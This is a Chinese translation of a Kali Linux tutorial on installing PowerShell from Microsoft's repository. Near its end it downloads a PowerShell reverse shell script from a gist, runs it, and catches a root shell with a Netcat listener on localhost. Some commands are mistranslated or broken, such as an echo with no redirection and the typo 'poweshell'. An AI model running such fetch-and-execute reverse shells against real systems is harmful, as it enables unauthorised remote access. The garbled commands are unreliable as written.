原文:https://www.kali.org/tutorials/installing-powershell-on-kali-linux/

您可能已经意识到可以安全地将外部存储库添加到Kali Linux安装中,但您可能不知道在线提供的众多存储库之一包括Microsoft的一个包含PowerShell的存储库。该存储库适用于Debian,但它的软件包在Kali上安装得非常好,我们将在这篇文章中展示。

Kali中的PowerShell包安装

我们首先安装必要的依赖项,默认情况下,大多数依赖项已经安装在Kali安装中。

apt update && apt -y install curl gnupg apt-transport-https

接下来,我们需要下载并添加公共存储库GPG密钥,以便APT信任这些软件包,并提醒您有关软件包签名的任何问题。

curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -

添加GPG密钥后,我们继续将Microsoft软件包存储库添加到/etc/apt/sources.list.d/下的自己的软件包列表文件中,并更新可用软件包列表。

echo “deb [arch = amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main” /etc/apt/sources.list.d/powershell.list

如果执行失败,可以进入到/etc/apt/sources.list.d/下,vim powershell.list

然后直接添加:

deb https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main

apt update

最后,我们继续安装powershell包。

apt -y install powershell

此时可能会出现报错提示:

按照提示,安装libcurl3即可:

apt install libcurl3

再进行powershell的安装:

apt install poweshell

运行PowerShell

软件包安装完成后,运行pwsh将启动PowerShell,向我们提供熟悉的“PS”提示。

root @ kali:〜#pwsh

PowerShell v6.1.0-preview.2

版权所有(c)Microsoft Corporation。版权所有。

https://aka.ms/pscore6-docs输入

“help”以获取帮助。

PS / root>

如果您是PowerShell的新手,您可能要做的第一件事就是更新内置帮助,这可以通过运行Update-HelpCmdlet来完成。这可能需要一段时间才能完成,但实际上只需要在极少数时间内运行一次。

PS / root> 更新 - 帮助

更新模块的

帮助Microsoft.PowerShell.Utility 查找帮助内容...

正如您所料,在Windows上使用PowerShell时,您将找不到所有已经习惯的命令,但所有核心模块都存在且代码处于不断的开发和改进之中。

PS / root> Get-Process -Name gnome *

NPM(K)PM(M)WS(M)CPU(s)Id SI ProcessName

  0 0.00 5.71 0.03 1073 072 gnome-keyring-d

  0 0.00 9.80 0.19 659 649 gnome-session-b

  0 0.00 13.72 0.36 1089 080 gnome-session-b

  0 0.00 110.06 3.36 778 649 gnome-shell

  0 0.00 277.15 27.85 1170 080 gnome-shell

  0 0.00 11.77 0.09 1199 075 gnome-shell-cal

  0 0.00 77.79 4.58 1381 080 gnome-software

  0 0.00 36.58 2.03 1646 646 gnome-terminal-

但是,您可以做的一件令人惊讶的事情是使用PowerShell将反向shell发送到Netcat侦听器。我们在网上遇到了一个小型PowerShell反向外壳,令我们惊讶的是,它很高兴地与我们的听众联系起来。

root @ kali:〜#pwsh

PowerShell v6.1.0-preview.2

版权所有(c)Microsoft Corporation。版权所有。

https://aka.ms/pscore6-docs输入

“help”以获取帮助。
PS /root> wget -q https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1

PS /root > ./mini-reverse.ps1

───────── ────────────────────────────────────────────────── ────────────────

@ @ kc:〜#nc -lvnp 413

listening on [any] 413 ...

connect to [127.0.0.1](UNKNOWN )[127.0.0.1] 59006

id

uid = 0(root)gid = 0(root)groups = 0(root)
uname -a

Linux kali 4.15.0-kali3-amd64#1 SMP Debian 4.15.17-1kali1(2018-04-25)x86_64 GNU / Linux

我们认为,不仅微软开源PowerShell,他们也不断更新和改进它,并且拥有一个公共软件包存储库,这使得安装变得轻而易举。

在推特上关注我们

关注@kalilinux

关注@offsectraining

关注@exploitdb

results matching ""

    No results matching ""